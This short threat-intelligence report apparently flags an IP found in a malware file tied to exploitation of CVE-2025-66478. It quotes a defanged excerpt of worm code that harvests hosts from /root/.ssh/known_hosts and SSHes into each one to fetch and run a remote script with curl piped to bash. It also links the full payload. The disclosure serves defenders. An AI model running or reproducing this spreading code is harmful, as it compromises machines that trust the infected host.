This IP was found in a file called cc.txt, which come from an active exploitation of CVE-2025-66478. ...
show moreThis IP was found in a file called cc.txt, which come from an active exploitation of CVE-2025-66478.
You can find the full payload here: http://38[.]150[.]0[.]136/dewfhuewr4r89/98hy67/cc.txt
Concerned subset of the file (defanged):
if [ -f /root/.ssh/known_hosts ] && [ -f /root/.ssh/id_rsa.pub ]; then
for h in $(grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" /root/.ssh/known_hosts); do ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h 'curl -o- http://38[.]150[.]0[.]36/dewfhuewr4r89/98hy67/cc.txt | bash >/dev/null 2>&1 &' & done
fi
if [ -f /root/.ssh/known_hosts ] && [ -f /root/.ssh/id_rsa.pub ]; then
for h in $(grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" /root/.ssh/known_hosts); do ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h 'cd1 -o- http://38[.]150[.]0[.]36/dewfhuewr4r89/98hy67/cc.txt | bash >/dev/null 2>&1 &' & done
fi
show less